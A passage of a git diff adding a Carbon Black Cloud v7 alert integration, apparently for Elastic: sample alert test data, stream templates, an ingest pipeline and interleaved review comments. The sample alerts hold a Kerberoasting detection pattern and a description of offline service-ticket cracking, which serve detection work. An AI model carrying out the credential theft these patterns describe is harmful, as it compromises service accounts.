"7DESJ9GN-0064e5a7-0000077c-00000000-1da5ed7ec07b275", + "executable": "c:\\windows\\system32\\svchost.exe", + "hash": { + "md5": "145dcf6706eeea5b066885ee17964c09", + "sha256": 
"f13de58416730d210dab465b242e9c949fb0a0245eef45b07c381f0c6c8a43c3" + }, + "name": "svchost.exe", + "pid": 1916 + }, + "pid": 5172 + }, + "related": { + "hash": [ + "f13de58416730d210dab465b242e9c949fb0a0245eef45b07c381f0c6c8a43c3", + "145dcf6706eeea5b066885ee17964c09", + "9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3", + "2e5a8590cf6848968fc23de3fa1e25f1" + ], + "hosts": [ + "WW-20002", + "EIP" + ], + "user": [ + "Administrator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "domain": "EIP", + "name": "Administrator" + } + }, + { + "@timestamp": "2023-07-17T17:21:13.483Z", + "carbon_black_cloud": { + "alert": { + "alert_notes_present": false, + "backend_timestamp": "2023-07-17T17:21:34.063Z", + "backend_update_timestamp": "2023-07-17T17:21:34.063Z", + "category": "THREAT", + "determination": { + "change_timestamp": "2023-07-17T17:21:34.063Z", + "value": "NONE" + }, + "device": { + "external_ip": "1.2.3.4", + "internal_ip": "4.3.2.1", + "location": "UNKNOWN", + "os": "WINDOWS", + "policy": "default", + "policy_id": 6525, + "target_value": "MEDIUM", + "uem_id": "596B6C4DD49AEF4AB3713363DDBB1F11" + }, + "ioc": { + "hit": "fileless_scriptload_cmdline:\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\" OR scriptload_content:\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\"", + "id": "b1c1ae83-f66b-4aa3-a496-363e296f4018" + }, + "is_updated": false, + "mdr": { + "alert": false, + "alert_notes_present": false, + "threat_notes_present": false + }, + "ml_classification_final_verdict": "ANOMALOUS", + "ml_classification_global_prevalence": "MEDIUM", + "ml_classification_org_prevalence": "LOW", + "organization_key": "ABCD1234", + "parent": { + "cmdline": "\"C:\\Program Files\\demo\\sample\\myscript.exe\" ", + "effective_reputation": "NOT_LISTED", + "guid": "ABCD1234-0059e1e0-00002890-00000000-1d9a898aa24acc9", + "hash": { + "md5": "c7e583681f0958d4f5d32afd09d8084b", + "sha256": 
"4ab2c4932e01ab8460bd8bff5afb0c76e9e238c10ce47515be40c49f652d0282" + }, + "name": "c:\\program files\\demo\\sample\\myscript.exe", + "pid": 10384, + "reputation": "NOT_LISTED", + "username": "NT AUTHORITY\\SYSTEM" + }, + "policy_applied": "NOT_APPLIED", + "primary_event_id": "VUX7Bu7vTrWwnU8-uSVh1A-0", + "process": { + "cmdline": "powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -", + "effective_reputation": "TRUSTED_WHITE_LIST", + "guid": "ABCD1234-0059e1e0-00003544-00000000-1d9b8db27a4d423", + "hash": { + "md5": "0499440c4b0783266183246e384c6657", + "sha256": "d436e66c0d092508e4b85290815ab375695fa9013c7423a3a27fed4f1acf90bd" + }, + "issuer": [ + "Microsoft Windows Production PCA 2011" + ], + "name": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "pid": 13636, + "publisher": [ + "Microsoft Windows" + ], + "reputation": "TRUSTED_WHITE_LIST", + "username": "NT AUTHORITY\\SYSTEM" + }, + "reason_code": "cf4e6de7-4aa8-3188-8034-6a54fdea940c:e17d957d-b504-3462-816c-f182fe1d80ab", + "report": { + "description": "Service accounts in Windows Active Directory environments have the ability to register under an AD security principle (user or computer) as a (SPN) Service Principal Name. The SPN registration allows for kerberos clients to request a kerberos service ticket associated with the service account SPN. This kerberos TGS is encrypted using the service accounts password. If a weak password is assigned to this service account an attacker can make an out of band request for one of these kerberos service tickets and crack it offline with tools like Jack the Ripper. This detection looks for fileless behaviors related to the out of band kerberos ticket request. 
If you are responding to this alert you should take immediate action and look at the process that alerted on this behavior as well as the other fileless script loads events.", + "id": "LrKOC7DtQbm4g8w0UFruQg-b1c1ae83-f66b-4aa3-a496-363e296f4018", + "link": "https://attack.mitre.org/techniques/T1558/003/", + "name": "Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior", + "tags": [ + "credentialaccess", + "t1558", + "windows", + "amsi", + "attack", + "attackframework" + ] + }, + "run_state": "RAN", + "sensor_action": "ALLOW", + "threat_id": "CF4E6DE74AA8B188C0346A54FDEA940C", + "threat_notes_present": false, + "type": "WATCHLIST", + "url": "defense.conferdeploy.net/alerts?s[c][query_string]=id:3d80bd8b-7770-40a7-8d6b-8268fb15c59f&orgKey=ABCD1234", + "watchlists": [ + { + "id": "Ci7w5B4URg6HN60hatQMQ", + "name": "AMSI Threat Intelligence" + } + ], + "workflow": { + "change_timestamp": "2023-07-17T17:21:34.063Z", + "changed_by": "ALERT_CREATION", + "changed_by_type": "SYSTEM", + "closure_reason": "NO_REASON", + "status": "OPEN" + } + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "end": "2023-07-17T17:19:00.412Z", + "id": "3d80bd8b-7770-40a7-8d6b-8268fb15c59f", + "kind": "alert", + "original": "{\"org_key\":\"ABCD1234\",\"alert_url\":\"defense.conferdeploy.net/alerts?s[c][query_string]=id:3d80bd8b-7770-40a7-8d6b-8268fb15c59f&orgKey=ABCD1234\",\"id\":\"3d80bd8b-7770-40a7-8d6b-8268fb15c59f\",\"type\":\"WATCHLIST\",\"backend_timestamp\":\"2023-07-17T17:21:34.063Z\",\"user_update_timestamp\":null,\"backend_update_timestamp\":\"2023-07-17T17:21:34.063Z\",\"detection_timestamp\":\"2023-07-17T17:21:13.483Z\",\"first_event_timestamp\":\"2023-07-17T17:19:00.412Z\",\"last_event_timestamp\":\"2023-07-17T17:19:00.412Z\",\"severity\":10,\"reason\":\"Process powershell.exe was detected by the report \\\"Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior\\\" in watchlist \\\"AMSI Threat 
Intelligence\\\"\",\"reason_code\":\"cf4e6de7-4aa8-3188-8034-6a54fdea940c:e17d957d-b504-3462-816c-f182fe1d80ab\",\"threat_id\":\"CF4E6DE74AA8B188C0346A54FDEA940C\",\"primary_event_id\":\"VUX7Bu7vTrWwnU8-uSVh1A-0\",\"policy_applied\":\"NOT_APPLIED\",\"run_state\":\"RAN\",\"sensor_action\":\"ALLOW\",\"workflow\":{\"change_timestamp\":\"2023-07-17T17:21:34.063Z\",\"changed_by_type\":\"SYSTEM\",\"changed_by\":\"ALERT_CREATION\",\"closure_reason\":\"NO_REASON\",\"status\":\"OPEN\"},\"determination\":{\"change_timestamp\":\"2023-07-17T17:21:34.063Z\",\"value\":\"NONE\",\"changed_by_type\":null,\"changed_by\":null},\"tags\":null,\"alert_notes_present\":false,\"threat_notes_present\":false,\"is_updated\":false,\"device_id\":5890528,\"device_name\":\"demodevice\",\"device_uem_id\":\"596B6C4DD49AEF4AB3713363DDBB1F11\",\"device_target_value\":\"MEDIUM\",\"device_policy\":\"default\",\"device_policy_id\":6525,\"device_os\":\"WINDOWS\",\"device_os_version\":\"Windows 11 x64\",\"device_username\":\"Test-Win11\",\"device_location\":\"UNKNOWN\",\"device_external_ip\":\"1.2.3.4\",\"device_internal_ip\":\"4.3.2.1\",\"mdr_alert\":false,\"mdr_alert_notes_present\":false,\"mdr_threat_notes_present\":false,\"report_id\":\"LrKOC7DtQbm4g8w0UFruQg-b1c1ae83-f66b-4aa3-a496-363e296f4018\",\"report_name\":\"Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior\",\"report_description\":\"Service accounts in Windows Active Directory environments have the ability to register under an AD security principle (user or computer) as a (SPN) Service Principal Name. The SPN registration allows for kerberos clients to request a kerberos service ticket associated with the service account SPN. This kerberos TGS is encrypted using the service accounts password. If a weak password is assigned to this service account an attacker can make an out of band request for one of these kerberos service tickets and crack it offline with tools like Jack the Ripper. 
This detection looks for fileless behaviors related to the out of band kerberos ticket request. If you are responding to this alert you should take immediate action and look at the process that alerted on this behavior as well as the other fileless script loads events.\",\"report_tags\":[\"credentialaccess\",\"t1558\",\"windows\",\"amsi\",\"attack\",\"attackframework\"],\"report_link\":\"https://attack.mitre.org/techniques/T1558/003/\",\"ioc_id\":\"b1c1ae83-f66b-4aa3-a496-363e296f4018\",\"ioc_hit\":\"fileless_scriptload_cmdline:\\\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\\\" OR scriptload_content:\\\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\\\"\",\"watchlists\":[{\"id\":\"Ci7w5B4URg6HN60hatQMQ\",\"name\":\"AMSI Threat Intelligence\"}],\"process_guid\":\"ABCD1234-0059e1e0-00003544-00000000-1d9b8db27a4d423\",\"process_pid\":13636,\"process_name\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"process_sha256\":\"d436e66c0d092508e4b85290815ab375695fa9013c7423a3a27fed4f1acf90bd\",\"process_md5\":\"0499440c4b0783266183246e384c6657\",\"process_effective_reputation\":\"TRUSTED_WHITE_LIST\",\"process_reputation\":\"TRUSTED_WHITE_LIST\",\"process_cmdline\":\"powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -\",\"process_username\":\"NT AUTHORITY\\\\SYSTEM\",\"process_issuer\":[\"Microsoft Windows Production PCA 2011\"],\"process_publisher\":[\"Microsoft Windows\"],\"parent_guid\":\"ABCD1234-0059e1e0-00002890-00000000-1d9a898aa24acc9\",\"parent_pid\":10384,\"parent_name\":\"c:\\\\program files\\\\demo\\\\sample\\\\myscript.exe\",\"parent_sha256\":\"4ab2c4932e01ab8460bd8bff5afb0c76e9e238c10ce47515be40c49f652d0282\",\"parent_md5\":\"c7e583681f0958d4f5d32afd09d8084b\",\"parent_effective_reputation\":\"NOT_LISTED\",\"parent_reputation\":\"NOT_LISTED\",\"parent_cmdline\":\"\\\"C:\\\\Program Files\\\\demo\\\\sample\\\\myscript.exe\\\" \",\"parent_username\":\"NT 
AUTHORITY\\\\SYSTEM\",\"childproc_guid\":\"\",\"childproc_username\":\"\",\"childproc_cmdline\":\"\",\"ml_classification_final_verdict\":\"ANOMALOUS\",\"ml_classification_global_prevalence\":\"MEDIUM\",\"ml_classification_org_prevalence\":\"LOW\"}", + "reason": "Process powershell.exe was detected by the report \"Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior\" in watchlist \"AMSI Threat Intelligence\"", + "severity": 10, + "start": "2023-07-17T17:19:00.412Z" + }, + "host": { + "hostname": "demodevice", + "id": "5890528", + "name": "demodevice", + "os": { + "type": "windows", + "version": "Windows 11 x64" + } + }, + "process": { + "command_line": "powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -", + "entity_id": "ABCD1234-0059e1e0-00003544-00000000-1d9b8db27a4d423", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "hash": { + "md5": "0499440c4b0783266183246e384c6657", + "sha256": "d436e66c0d092508e4b85290815ab375695fa9013c7423a3a27fed4f1acf90bd" + }, + "name": "powershell.exe", + "parent": { + "command_line": "\"C:\\Program Files\\demo\\sample\\myscript.exe\" ", + "entity_id": "ABCD1234-0059e1e0-00002890-00000000-1d9a898aa24acc9", + "executable": "c:\\program files\\demo\\sample\\myscript.exe", + "hash": { + "md5": "c7e583681f0958d4f5d32afd09d8084b", + "sha256": "4ab2c4932e01ab8460bd8bff5afb0c76e9e238c10ce47515be40c49f652d0282" + }, + "name": "myscript.exe", + "pid": 10384 + }, + "pid": 13636 + }, + "related": { + "hash": [ + "4ab2c4932e01ab8460bd8bff5afb0c76e9e238c10ce47515be40c49f652d0282", + "c7e583681f0958d4f5d32afd09d8084b", + "d436e66c0d092508e4b85290815ab375695fa9013c7423a3a27fed4f1acf90bd", + "0499440c4b0783266183246e384c6657" + ], + "hosts": [ + "demodevice" + ], + "user": [ + "Test-Win11" + ] + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "name": "Test-Win11" + } + } + ] +} \ No newline at end of file 
diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-common-config.yml b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-common-config.yml
new file mode 100644
index 00000000000..4da22641654
--- /dev/null
+++ b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-common-config.yml
@@ -0,0 +1,3 @@
+fields:
+ tags:
+ - preserve_original_event
diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/system/test-cel-config.yml b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/system/test-cel-config.yml
new file mode 100644
index 00000000000..ff03928cbb3
--- /dev/null
+++ b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/system/test-cel-config.yml
@@ -0,0 +1,11 @@
+input: cel
+service: carbon_black_cloud
+vars:
+ hostname: http://{{Hostname}}:{{Port}}
+ org_key: xxxx
+ custom_api_id: xxxx
+ custom_api_secret_key: xxxx
+data_stream:
+ vars:
+ preserve_original_event: true
+ enable_request_tracer: true
diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/agent/stream/aws-s3.yml.hbs b/packages/carbon_black_cloud/data_stream/alert_v7/agent/stream/aws-s3.yml.hbs
new file mode 100644
index 00000000000..017d6e7fe37
--- /dev/null
+++ b/packages/carbon_black_cloud/data_stream/alert_v7/agent/stream/aws-s3.yml.hbs
@@ -0,0 +1,84 @@
+{{#if collect_s3_logs}}
+
+{{#if bucket_arn}}
+bucket_arn: {{bucket_arn}}
+{{/if}}
+{{#if number_of_workers}}
+number_of_workers: {{number_of_workers}}
+{{/if}}
+{{#if interval}}
+bucket_list_interval: {{interval}}
+{{/if}}
+{{#if bucket_list_prefix}}
+bucket_list_prefix: {{bucket_list_prefix}}
+{{/if}}
+
+{{else}}
+
+{{#if queue_url_alert}}
+queue_url: {{queue_url_alert}}
+{{else if queue_url}}
+queue_url: {{queue_url}}
+{{/if}}
+{{#if visibility_timeout}}
+visibility_timeout: {{visibility_timeout}}
+{{/if}}
+{{#if api_timeout}}
+api_timeout: {{api_timeout}}
+{{/if}}
+{{#if max_number_of_messages}}
+max_number_of_messages: {{max_number_of_messages}}
+{{/if}}
+{{#if file_selectors}}
+file_selectors:
+{{file_selectors}}
+{{/if}}
+{{/if}}
+
+expand_event_list_from_field: Records
+{{#if access_key_id}}
+access_key_id: {{access_key_id}}
+{{/if}}
+{{#if secret_access_key}}
+secret_access_key: {{secret_access_key}}
+{{/if}}
+{{#if session_token}}
+session_token: {{session_token}}
+{{/if}}
+{{#if shared_credential_file}}
+shared_credential_file: {{shared_credential_file}}
+{{/if}}
+{{#if credential_profile_name}}
+credential_profile_name: {{credential_profile_name}}
+{{/if}}
+{{#if role_arn}}
+role_arn: {{role_arn}}
+{{/if}}
+{{#if endpoint}}
+endpoint: {{endpoint}}
+{{/if}}
+{{#if fips_enabled}}
+fips_enabled: {{fips_enabled}}
+{{/if}}
+{{#if proxy_url}}
+proxy_url: {{proxy_url}}
+{{/if}}
+tags:
+{{#if collect_s3_logs}}
+ - collect_s3_logs
+{{else}}
+ - collect_sqs_logs
+{{/if}}
+{{#if preserve_original_event}}
+ - preserve_original_event
+{{/if}}
+{{#each tags as |tag|}}
+ - {{tag}}
+{{/each}}
+{{#contains "forwarded" tags}}
+publisher_pipeline.disable_host: true
+{{/contains}}
+{{#if processors}}
+processors:
+{{processors}}
+{{/if}}
diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/agent/stream/cel.yml.hbs b/packages/carbon_black_cloud/data_stream/alert_v7/agent/stream/cel.yml.hbs
new file mode 100644
index 00000000000..e99d10d012e
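Review bot: `secret_access_key`, `session_token` and `access_key_id` are rendered as plain values into the stream configuration, and whether the policy stores them as secrets is decided by the variable declarations in the data stream manifest, which is outside this diff; please confirm those variables (and `custom_api_secret_key` used by the CEL stream) are declared with `secret: true` there. A second, smaller point is that `bucket_list_interval: {{interval}}` reuses the generic `interval` variable for the S3 listing period while the CEL stream uses the same name for its polling interval, so a short comment in the manifest description saying which input each value applies to would save operators a wrong assumption. Nothing in the template guards the `collect_s3_logs` branch when `bucket_arn` is empty; that is presumably left to the input's own validation, but it is worth stating in the variable description.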
--- /dev/null
+++ b/packages/carbon_black_cloud/data_stream/alert_v7/agent/stream/cel.yml.hbs
@@ -0,0 +1,74 @@
+config_version: 2
+interval: {{interval}}
+{{#if http_client_timeout}}
+resource.timeout: {{http_client_timeout}}
+{{/if}}
+{{#if enable_request_tracer}}
+resource.tracer.filename: "../../logs/httpjson/http-request-trace-*.ndjson"
+resource.tracer.maxbackups: 5
+{{/if}}
+{{#if proxy_url}}
+resource.proxy_url: {{proxy_url}}
+{{/if}}
+{{#if ssl}}
+resource.ssl: {{ssl}}
+{{/if}}
+resource.url: {{hostname}}/api/alerts/v7/orgs/{{org_key}}/alerts/_search
+state:
+ api_key: '{{custom_api_secret_key}}/{{custom_api_id}}'
+ want_more: false
+ initial_interval: {{initial_interval}}
+redact:
+ fields:
+ - api_key
+# The alert data stream has a 15-minute delay to ensure that no occurrences are missed.
+program: |
+ request("POST", state.url).with({
+ "Header":{
+ "Content-Type": ["application/json"],
+ "X-Auth-Token": [state.api_key],
+ },
+ "Body":{
+ "time_range": {
+ "start": state.?cursor.last_backend_update_timestamp.orValue(string(now - duration(state.initial_interval) + duration("-15m"))),
+ "end": string(now + duration("-15m"))
+ },
+ "sort" : [{ "field": "backend_update_timestamp", "order": "ASC"}],
+ }.encode_json(),
+ }).do_request().as(resp, bytes(resp.Body).decode_json().as(body, {
+ "events": body.results.map(e, {
+ "message": e.encode_json(),
+ }),
+ "cursor": {
+ ?"last_backend_update_timestamp": (
+ has(body.results) && body.results.size() > 0 ?
+ optional.of(body.results.map(e, e.backend_update_timestamp).max().as(last_update,
+ !has(state.?cursor.last_backend_update_timestamp) ?
+ last_update
+ : last_update < state.cursor.last_backend_update_timestamp ?
+ state.cursor.last_backend_update_timestamp
+ :
+ last_update
+ ))
+ :
+ state.?cursor.last_backend_update_timestamp
+ ),
+ },
+ "want_more": body.?num_found != body.?num_available,
+ "api_key": state.api_key,
+ "initial_interval": state.initial_interval,
+ }))
+tags:
+{{#if preserve_original_event}}
+ - preserve_original_event
+{{/if}}
+{{#each tags as |tag|}}
+ - {{tag}}
+{{/each}}
+{{#contains "forwarded" tags}}
+publisher_pipeline.disable_host: true
+{{/contains}}
+{{#if processors}}
+processors:
+{{processors}}
+{{/if}}
diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/elasticsearch/ingest_pipeline/default.yml b/packages/carbon_black_cloud/data_stream/alert_v7/elasticsearch/ingest_pipeline/default.yml
new file mode 100644
index 00000000000..0082f618f83
--- /dev/null
+++ b/packages/carbon_black_cloud/data_stream/alert_v7/elasticsearch/ingest_pipeline/default.yml
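Review bot: The search body sets no `rows` or `start`, and `"want_more": body.?num_found != body.?num_available` decides whether to page; if, as the v7 alerts API documents, `num_found` is the total match count and `num_available` the total retrievable (capped) count, that test is not "this page was short" and a window holding more alerts than the server's default page size would only be drained on later intervals, with the cursor already advanced past them. Consider setting `rows` explicitly in the body and deriving the flag from the returned page, along the lines of `"want_more": has(body.results) && body.results.size() < int(body.?num_found.orValue(0)),` — please verify against the API's field semantics before adopting it. The cursor ordering on lines 47–54 compares `backend_update_timestamp` values with string `<` and `max()`, which is only correct while the API keeps emitting the same fixed-width UTC format, so a one-line comment saying that assumption is relied on would help the next maintainer. Separately, `resource.tracer.filename` points at `../../logs/httpjson/...` although this is a CEL stream, which looks copied from an httpjson template; the trace file records full request headers, so `X-Auth-Token` lands there whenever `enable_request_tracer` is on and the variable's manifest description should state that.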
@@ -0,0 +1,912 @@ +--- +description: Pipeline for parsing Carbon Black Cloud alerts. +processors: + # ecs fields + - set: + field: ecs.version + value: '8.11.0' + - rename: + field: message + target_field: event.original + ignore_missing: true + if: ctx.event?.original == null + - json: + field: event.original + target_field: json + ignore_failure: true + - fingerprint: + fields: + - json.id + - json.detection_timestamp + - json.backend_timestamp + - json.backend_update_timestamp + target_field: _id + ignore_missing: true + - set: + field: event.kind + value: alert + - rename: + field: json.id + target_field: event.id + ignore_missing: true + - date: + field: json.detection_timestamp + if: ctx.json?.detection_timestamp != null && ctx.json.detection_timestamp != '' + formats: + - ISO8601 + on_failure: + - remove: + field: json.detection_timestamp + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.first_event_timestamp + target_field: event.start + if: ctx.json?.first_event_timestamp != null && ctx.json.first_event_timestamp != '' + formats: + - ISO8601 + on_failure: + - remove: + field: json.first_event_timestamp + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.last_event_timestamp + target_field: event.end + if: ctx.json?.last_event_timestamp != null && ctx.json.last_event_timestamp != '' + formats: + - ISO8601 + on_failure: + - remove: + field: json.last_event_timestamp + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.severity + target_field: event.severity + 
type: long + ignore_missing: true + on_failure: + - remove: + field: json.severity + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.reason + target_field: event.reason + ignore_missing: true + - convert: + field: json.device_id + target_field: host.id + type: string + ignore_missing: true + ignore_failure: true + - set: + field: host.os.type + value: windows + if: ctx.json?.device_os == 'WINDOWS' + - set: + field: host.os.type + value: linux + if: ctx.json?.device_os == 'LINUX' + - set: + field: host.os.type + value: macos + if: ctx.json?.device_os == 'MAC' + - rename: + field: json.device_os_version + target_field: host.os.version + ignore_missing: true + - rename: + field: json.device_name + target_field: host.hostname + ignore_missing: true + - grok: + field: host.hostname + patterns: + - '^(%{DATA:user.domain})\\(%{GREEDYDATA:host.hostname})$' + ignore_missing: true + ignore_failure: true + - set: + field: host.name + value: '{{{host.hostname}}}' + ignore_failure: true + - append: + field: related.hosts + value: '{{{host.hostname}}}' + if: ctx.host?.hostname != null + allow_duplicates: false + ignore_failure: true + - rename: + field: json.device_username + target_field: user.name + ignore_missing: true + - grok: + field: user.name + patterns: + - '^(%{DATA:user.domain})\\(%{GREEDYDATA:user.name})$' + ignore_missing: true + ignore_failure: true + - append: + field: related.hosts + value: '{{{user.domain}}}' + if: ctx.user?.domain != null + allow_duplicates: false + ignore_failure: true + - append: + field: related.user + value: '{{{user.name}}}' + if: ctx.user?.name != null + allow_duplicates: false + ignore_failure: true + # carbon_black_cloud fields + - date: + field: json.backend_timestamp + target_field: carbon_black_cloud.alert.backend_timestamp + if: ctx.json?.backend_timestamp != null 
&& ctx.json.backend_timestamp != '' + formats: + - ISO8601 + on_failure: + - remove: + field: json.backend_timestamp + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.backend_update_timestamp + target_field: carbon_black_cloud.alert.backend_update_timestamp + if: ctx.json?.backend_update_timestamp != null && ctx.json.backend_update_timestamp != '' + formats: + - ISO8601 + on_failure: + - remove: + field: json.backend_update_timestamp + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.user_update_timestamp + target_field: carbon_black_cloud.alert.user_update_timestamp + if: ctx.json?.user_update_timestamp != null && ctx.json.user_update_timestamp != '' + formats: + - ISO8601 + on_failure: + - remove: + field: json.user_update_timestamp + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.ttps + if: ctx.json?.ttps instanceof List + ignore_missing: true + processor: + append: + field: carbon_black_cloud.alert.ttps + value: '{{{_ingest._value}}}' + allow_duplicates: false + - foreach: + field: json.threat_category + if: ctx.json?.threat_category instanceof List + ignore_missing: true + processor: + append: + field: carbon_black_cloud.alert.threat_category + value: '{{{_ingest._value}}}' + allow_duplicates: false + - foreach: + field: json.ml_classification_anomalies + if: ctx.json?.ml_classification_anomalies instanceof List + ignore_missing: true + processor: + append: + field: carbon_black_cloud.alert.ml_classification_anomalies + value: '{{{_ingest._value}}}' + 
allow_duplicates: false + - convert: + field: json.alert_notes_present + target_field: carbon_black_cloud.alert.alert_notes_present + type: boolean + ignore_missing: true + on_failure: + - remove: + field: json.alert_notes_present + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.threat_notes_present + target_field: carbon_black_cloud.alert.threat_notes_present + type: boolean + ignore_missing: true + on_failure: + - remove: + field: json.threat_notes_present + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.additional_events_present + target_field: carbon_black_cloud.alert.additional_events_present + type: boolean + ignore_missing: true + on_failure: + - remove: + field: json.additional_events_present + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.alert_url + target_field: carbon_black_cloud.alert.url + ignore_missing: true + - rename: + field: json.primary_event_id + target_field: carbon_black_cloud.alert.primary_event_id + ignore_missing: true + - rename: + field: json.org_key + target_field: carbon_black_cloud.alert.organization_key + ignore_missing: true + - rename: + field: json.vendor_name + target_field: carbon_black_cloud.alert.vendor_name + ignore_missing: true + - rename: + field: json.product_name + target_field: carbon_black_cloud.alert.product_name + ignore_missing: true + - rename: + field: json.serial_number + target_field: carbon_black_cloud.alert.serial_number + ignore_missing: true + - rename: + field: json.threat_id + target_field: 
carbon_black_cloud.alert.threat_id + ignore_missing: true + - rename: + field: json.policy_applied + target_field: carbon_black_cloud.alert.policy_applied + ignore_missing: true + # carbon_black_cloud parent process fields & ecs parent process fields + - rename: + field: json.parent_name + target_field: process.parent.name + ignore_missing: true + - set: + field: process.parent.executable + copy_from: process.parent.name + ignore_empty_value: true + - set: + field: carbon_black_cloud.alert.parent.name + copy_from: process.parent.name + ignore_empty_value: true + - rename: + field: json.parent_cmdline + target_field: process.parent.command_line + ignore_missing: true + - set: + field: carbon_black_cloud.alert.parent.cmdline + copy_from: process.parent.command_line + ignore_empty_value: true + - rename: + field: json.parent_guid + target_field: process.parent.entity_id + ignore_missing: true + - set: + field: carbon_black_cloud.alert.parent.guid + copy_from: process.parent.entity_id + ignore_empty_value: true + - rename: + field: json.parent_pid + target_field: process.parent.pid + ignore_missing: true + - set: + field: carbon_black_cloud.alert.parent.pid + copy_from: process.parent.pid + ignore_empty_value: true + - rename: + field: json.parent_sha256 + target_field: process.parent.hash.sha256 + ignore_missing: true + - set: + field: carbon_black_cloud.alert.parent.hash.sha256 + copy_from: process.parent.hash.sha256 + ignore_empty_value: true + - append: + field: related.hash + value: '{{{carbon_black_cloud.alert.parent.hash.sha256}}}' + if: ctx.carbon_black_cloud?.alert?.parent?.hash?.sha256 != null + allow_duplicates: false + ignore_failure: true + - rename: + field: json.parent_md5 + target_field: process.parent.hash.md5 + ignore_missing: true + - set: + field: carbon_black_cloud.alert.parent.hash.md5 + copy_from: process.parent.hash.md5 + ignore_empty_value: true + - append: + field: related.hash + value: '{{{carbon_black_cloud.alert.parent.hash.md5}}}' + if: 
ctx.carbon_black_cloud?.alert?.parent?.hash?.md5 != null + allow_duplicates: false + ignore_failure: true + - rename: + field: json.parent_username + target_field: carbon_black_cloud.alert.parent.username + ignore_missing: true + - rename: + field: json.parent_reputation + target_field: carbon_black_cloud.alert.parent.reputation + ignore_missing: true + - rename: + field: json.parent_effective_reputation + target_field: carbon_black_cloud.alert.parent.effective_reputation + ignore_missing: true + - script: + description: Removes complete path from ecs field parent.process.name + lang: painless + if: ctx?.process?.parent?.name != null + source: | + ctx.process.parent.name = ctx.process.parent.name.substring(ctx.process.parent.name.lastIndexOf('\\') + 1); +# carbon_black_cloud process fields & ecs process fields + - foreach: + field: json.process_issuer + if: ctx.json?.process_issuer instanceof List + ignore_missing: true + processor: + append: + field: carbon_black_cloud.alert.process.issuer + value: '{{{_ingest._value}}}' + allow_duplicates: false + - foreach: + field: json.process_publisher + if: ctx.json?.process_publisher instanceof List + ignore_missing: true + processor: + append: + field: carbon_black_cloud.alert.process.publisher + value: '{{{_ingest._value}}}' + allow_duplicates: false + - rename: + field: json.process_name + target_field: process.name + ignore_missing: true + - set: + field: process.executable + copy_from: process.name + ignore_empty_value: true + - set: + field: carbon_black_cloud.alert.process.name + copy_from: process.name + ignore_empty_value: true + - rename: + field: json.process_username + target_field: carbon_black_cloud.alert.process.username + ignore_missing: true + - rename: + field: json.process_cmdline + target_field: process.command_line + ignore_missing: true + - set: + field: carbon_black_cloud.alert.process.cmdline + copy_from: process.command_line + ignore_empty_value: true + - rename: + field: json.process_guid + 
